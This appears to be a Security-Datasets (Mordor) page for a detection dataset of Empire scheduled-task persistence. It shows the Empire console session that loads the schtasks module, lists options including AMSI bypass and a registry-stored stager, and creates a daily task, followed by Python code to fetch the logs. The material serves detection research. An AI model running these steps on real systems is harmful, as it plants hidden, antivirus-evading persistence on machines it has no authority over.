Empire Userland Scheduled Tasks

Metadata

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/03/19

Modification Date

2020/09/20

Tactics

TA0003

Techniques

T1053.005

Tags

Local Scheduled Tasks

Dataset Description

This dataset represents adversaries creating and/or executing local scheduled tasks to maintain persistence in an environment.

Simulation Metadata

Tools

type

Name

Module

C2

Empire

schtasks

Adversary View

(Empire: stager/multi/launcher) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
A7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            
HBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            
UF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http            

3MWPS8L6 ps 172.18.39.5     WORKSTATION5      THESHIRE\pgustavo       powershell         7312   5/0.0    2020-09-21 07:12:36  http            

(Empire: agents) > interact 3MWPS8L6         
(Empire: 3MWPS8L6) > usemodule persistence/userland/schtasks
(Empire: powershell/persistence/userland/schtasks) > info

              Name: Invoke-Schtasks
            Module: powershell/persistence/userland/schtasks
        NeedsAdmin: False
        OpsecSafe: False
          Language: powershell
MinLanguageVersion: 2
        Background: False
  OutputExtension: None

Authors:
  @mattifestation
  @harmj0y

Description:
  Persist a stager (or script) using schtasks. This has a
  moderate detection/removal rating.

Comments:
  https://github.com/mattifestation/PowerSploit/blob/master/Pe
  rsistence/Persistence.psm1

Options:

  Name             Required    Value                     Description
  ----             --------    -------                   -----------
  Agent            True        3MWPS8L6                  Agent to run module on.                 
  Listener         False                                 Listener to use.                        
  Obfuscate        False       False                     Switch. Obfuscate the launcher          
                                                        powershell code, uses the               
                                                        ObfuscateCommand for obfuscation types. 
                                                        For powershell only.                    
  ObfuscateCommand False       Token\All\1               The Invoke-Obfuscation command to use.  
                                                        Only used if Obfuscate switch is True.  
                                                        For powershell only.                    
  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in 
                                                        the stager code.                        
  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   
                                                        the stager code.                        
  DailyTime        False       09:00                     Daily time to trigger the script        
                                                        (HH:mm).                                
  IdleTime         False                                 User idle time (in minutes) to trigger  
                                                        script.                                 
  TaskName         True        Updater                   Name to use for the schtask.            
  RegPath          False       HKCU:\Software\Microsoft  Registry location to store the script   
                              \Windows\CurrentVersion\  code. Last element is the key name.     
                              debug                   
  ADSPath          False                                 Alternate-data-stream location to store 
                                                        the script code.                        
  ExtFile          False                                 Use an external file for the payload    
                                                        instead of a stager.                    
  Cleanup          False                                 Switch. Cleanup the trigger and any     
                                                        script from specified location.         
  UserAgent        False       default                   User-agent string to use for the staging
                                                        request (default, none, or other).      
  Proxy            False       default                   Proxy to use for request (default, none,
                                                        or other).                              
  ProxyCreds       False       default                   Proxy credentials                       
                                                        ([domain\]username:password) to use for 
                                                        request (default, none, or other).      

(Empire: powershell/persistence/userland/schtasks) > set Listener http
(Empire: powershell/persistence/userland/schtasks) > set TaskName MordorSchtask
(Empire: powershell/persistence/userland/schtasks) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked 3MWPS8L6 to run TASK_CMD_WAIT
[*] Agent 3MWPS8L6 tasked with task ID 1
[*] Tasked agent 3MWPS8L6 to run module powershell/persistence/userland/schtasks
(Empire: powershell/persistence/userland/schtasks) > 
SUCCESS: The scheduled task "MordorSchtask" has successfully been created.
Schtasks persistence established using listener http stored in HKCU:\Software\Microsoft\Windows\CurrentVersion\debug with MordorSchtask daily trigger at 09:00.

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_schtasks_creation_standard_user.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.groupby(['Channel']).size().sort_values(ascending=False)